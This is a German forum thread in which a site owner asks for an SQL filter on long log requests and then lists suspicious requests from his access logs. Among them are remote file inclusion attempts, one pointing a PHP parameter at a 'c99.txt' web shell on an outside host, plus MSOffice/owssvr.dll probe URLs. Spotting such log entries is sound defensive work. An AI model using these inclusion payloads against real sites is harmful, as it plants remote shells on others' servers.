[SQL] Where Zeile > 25 Zeichen

[Ice Man]

Ich hab mir ja gestern ein Tool gebastelt, mit dem ich meine Logfiles analysiere.

Die meisten anderen Tools machten irgendwie nicht das was ich wollte
Bei meiner Analyse hab ich dieses Spezi gefunden

Browserkennung: pang0Zilla

Er hat meine Seite so aufgerufen

/seitexyz.php?site_path=https://xxx-xxx.uol.com.br/uol/index.html?....

Ich denke der wollte bei mir irgendwas einschleusen.
Hab die Kennung gleich mal gesperrt.

Nun wollte ich eine Weitere Abfrage in mein Tool einbauen, was solche eventuellen gefährlichen Abfragen Filter.

Müsste in der Form aussehen.

Where zeile > 25 Zeichen

Auf deutsch, er soll alles ausspucken was in der Zeile 'request' mehr als 25 Zeichen hat.

Damit finde ich alle solche Anhänge.

Vielen Dank im Voraus für den Input

[Zerstreuter]

SELECT * FROM tabelle WHERE LENGTH(request)>25

[gaggi]

versuch es mal im format

Code: Alles auswählen

SELECT a,b,c from d WHERE e = ________________________%

müsste klappen sollte dir alles liefern was 25 beliebige zeichen plus mehr als 0 zeichen als wert hat.[/code]

[Ice Man]

Danke, hat sich echt gelohnt.

Hier mal meine Ergebnisse, ich wette solche habt ihr auch

/meine_unterseite.php?site_path=https://xxxxx.uol.com.br/uol/index.html?....
/meine_unterseite?go=https://evilc0der.xXx/c99.txt?....
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0

IPs waren Turkey, Iran und Jordan

[seikodäd]

anfragen mit "msoffice" habe ich auch des öfteren, die entspr. einträge landen allerdings in der error.log... worauf diese anfragen abzielen, würde mich auch mal interessieren...